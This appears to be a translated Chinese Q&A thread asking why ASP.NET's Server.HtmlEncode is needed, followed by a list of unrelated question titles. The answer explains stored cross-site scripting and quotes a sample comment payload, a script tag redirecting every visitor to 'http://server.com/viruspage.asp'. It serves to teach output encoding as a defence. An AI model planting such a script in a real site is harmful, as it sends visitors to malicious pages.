4
我無法理解爲什麼需要Server.HtmlEncode? MSDN指出,它用於將潛在的不安全字符編碼爲與HTML編碼等效的字符。爲什麼需要Server.HtmlEncode?
有人可以給我一些想法如何這些字符是不安全的,並要求我們使用Server.HtmlEncode?
謝謝。
A
回答
10
字符可能不安全的一個示例是用戶在頁面上提交評論。如果評論表單不使用HtmlEncode,則用戶剛輸入的任何內容現在都將作爲頁面上的評論可見。在這種情況下,黑客可以像提交評論如下:
<script language="javascript" type="text/javascript">
window.location = 'http://server.com/viruspage.asp';
</script>
對於誰加載頁面,將運行該腳本(因爲它沒有被編碼爲的HTMLEncode),其後每用戶,每一個用戶重定向到一個帶有病毒的頁面。這是一個非常簡單的例子,但還有許多其他輸入惡意數據的方式,甚至可能讓黑客對您的數據庫進行管理訪問。
相關問題
- 1. 什麼是Server.HtmlEncode()?
- 2. 爲什麼需要
- 3. 爲什麼需要「{} \」?
- 4. 爲什麼需要copy_to/from_user?
- 5. 爲什麼Grails需要Xerces?
- 6. 爲什麼我需要「&」?
- 7. 爲什麼需要$ = jQuery
- 8. 爲什麼//需要的/
- 9. 爲什麼這需要malloc'd?
- 10. 爲什麼RVM需要YAML?
- 11. 爲什麼mybatis需要@Param?
- 12. 爲什麼需要DevKit
- 13. 爲什麼HttpClient需要httpasyncclient?
- 14. 爲什麼需要NotificationCompat?
- 15. 爲什麼需要session_ destroy()?
- 16. 爲什麼需要光標?
- 17. 爲什麼需要isLargeArc?
- 18. 爲什麼PayPal需要DoExpressCheckoutPayment?
- 19. 爲什麼android需要jvm
- 20. 爲什麼initWithCoder需要self.property?
- 21. 爲什麼Hbase需要WAL?
- 22. 爲什麼scanf需要&?
- 23. 爲什麼Apache需要SSLCertificateKeyFile?
- 24. 爲什麼active_support需要sinatra
- 25. 爲什麼需要「bear_moved」?
- 26. 爲什麼PhotoCamera需要VideoBrush?
- 27. 爲什麼需要線程
- 28. 爲什麼BizTalk需要MSDTC?
- 29. 爲什麼需要StaticResource?
- 30. 爲什麼需要解析?
用兩個字? XSS攻擊。 http://en.wikipedia.org/wiki/Cross-site_scripting –